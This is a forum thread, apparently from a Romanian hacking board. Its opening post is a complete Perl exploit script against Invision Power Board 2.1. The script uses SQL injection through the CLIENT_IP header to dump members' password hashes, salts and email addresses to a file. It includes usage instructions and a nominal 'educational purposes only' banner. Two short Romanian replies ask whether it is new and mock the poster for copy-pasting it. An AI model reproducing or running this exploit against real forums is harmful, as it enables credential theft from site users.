Proxenon Posted April 24, 2008 Report Share Posted April 24, 2008 Rated as : Moderated Risk#!/usr/bin/perluse LWP::UserAgent;$ua = LWP::UserAgent->new;&header();if (@ARGV < 2) {&info(); exit();}$server = $ARGV[0];$dir = $ARGV[1];print "[+] SERVER {$server}\r\n";print "[+] DIR {$dir}\r\n";#Step 1, detecting vulnerabilityprint "[1] Testing forum vulnerability...";$q = "UNION SELECT 'VULN',1,1,1/*";query($q,$server,$dir);if($rep =~/VULN/){ print "forum vulnerable\r\n"; }else { print "forum unvulnerable\r\n"; &footer(); exit(); }#Step 2, detecting prefixprint "[2] Searching prefix...";$q = "";query($q,$server,$dir);$prefix = $rep;print $prefix."\r\n";#Step 3, make queryprint "[3] Performing query; it may take several minutes, plz,wait...\r\n";$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM".$prefix."members_converge/*";query($q1,$server,$dir);$kol = $rep;open(RES,">".$server."_result.txt");for($id = 1; $id <= $kol; $id++) { $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM".$prefix."members_converge WHEREconverge_id=".$id."/*"; query($own_query,$server,$dir); if($rep=~/[0-9a-f]{32}/i) { $hash = $rep; $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM".$prefix."members_converge WHEREconverge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)==5) { $salt = $rep; $own_query = "UNION SELECT converge_email,1,1,1 FROM".$prefix."members_converge WHEREconverge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)>0) { $email = $rep; print RES$id.":".$hash.":".$salt."::".$email."\n"; } } } }close(RES);print "[!] Query was successfully perfomed. Results are in txtfiles\r\n";&footer();$ex = <STDIN>;sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info | damagelab.org |rst.void.ru\r\n"; }sub header(){print q(----------------------------------------------------------* Invision Power Board 2.1.* Remote SQL Injecton Exploit ** Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) ** Coded by w4g.not null ** FOR EDUCATIONAL PURPOSES *ONLY* *----------------------------------------------------------);}sub info(){ print q( Usage: perl w4gipb216.pl [server] [/dir/] where |- server - server, where IPB installed without http:// |- /dir/ - dir, where IPB installed or / for no dir e.g perl w4gipb216.pl someserver.com /forum/ Stealing info about users (format id:pass:salt::email) [!] Need MySQL > 4.0 );}sub query() { my($q,$server,$dir) = @_; $res =$ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"'".$q); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $rep = $3; } else { if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; } } } return $rep; }securitydot.net - 2006-07-19 Quote Link to comment Share on other sites More sharing options...
Hertz Posted April 24, 2008 Report Share Posted April 24, 2008 Sti cat e de "nou" ? Quote Link to comment Share on other sites More sharing options...
CobrA Posted April 24, 2008 Report Share Posted April 24, 2008 Omu a vazut a dat copy a intrat aici si a dat paste.(postul conteaza) Si e cool tipu. Shoot yourself looser Quote Link to comment Share on other sites More sharing options...
